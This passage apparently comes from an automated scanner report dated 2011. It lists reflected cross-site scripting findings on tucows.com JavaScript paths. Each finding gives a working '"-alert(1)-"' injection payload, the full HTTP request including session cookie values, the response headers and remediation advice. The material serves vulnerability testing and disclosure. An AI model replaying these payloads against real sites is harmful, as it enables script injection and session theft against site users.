The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a833"-alert(1)-"f1b3a80e89c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets5a833"-alert(1)-"f1b3a80e89c/includes/js/show_layer.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:28 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be914"-alert(1)-"d7583b93b1f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includesbe914"-alert(1)-"d7583b93b1f/js/show_layer.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:38 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 254cc"-alert(1)-"7ef9881c0ed was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js254cc"-alert(1)-"7ef9881c0ed/show_layer.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:50 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aae9e"-alert(1)-"0ee85bcbea6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js/show_layer.jsaae9e"-alert(1)-"0ee85bcbea6 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:59 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
1.42. http://www.tucows.com/images/newassets/includes/js/show_layer.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/images/newassets/includes/js/show_layer.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b38f6"-alert(1)-"339c2aebf39 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js/show_layer.js?b38f6"-alert(1)-"339c2aebf39=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:06 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3b50"-alert(1)-"b444dbcbd88 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imagesf3b50"-alert(1)-"b444dbcbd88/newassets/includes/js/signupin.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:56 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d53eb"-alert(1)-"62bf072695 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassetsd53eb"-alert(1)-"62bf072695/includes/js/signupin.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:07 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c81a"-alert(1)-"2b1a48bb558 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes3c81a"-alert(1)-"2b1a48bb558/js/signupin.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:21 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8017"-alert(1)-"b67c8ffcb4e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/jse8017"-alert(1)-"b67c8ffcb4e/signupin.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:31 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6806a"-alert(1)-"96913118ea0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js/signupin.js6806a"-alert(1)-"96913118ea0 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:41 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
1.48. http://www.tucows.com/images/newassets/includes/js/signupin.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/images/newassets/includes/js/signupin.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12dab"-alert(1)-"167442f74b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js/signupin.js?12dab"-alert(1)-"167442f74b4=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:35 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e30d"-alert(1)-"7ba0537e045 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images8e30d"-alert(1)-"7ba0537e045/newassets/includes/js/x_core.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:23 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 189cd"-alert(1)-"ae1dffd01f2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets189cd"-alert(1)-"ae1dffd01f2/includes/js/x_core.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:31 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
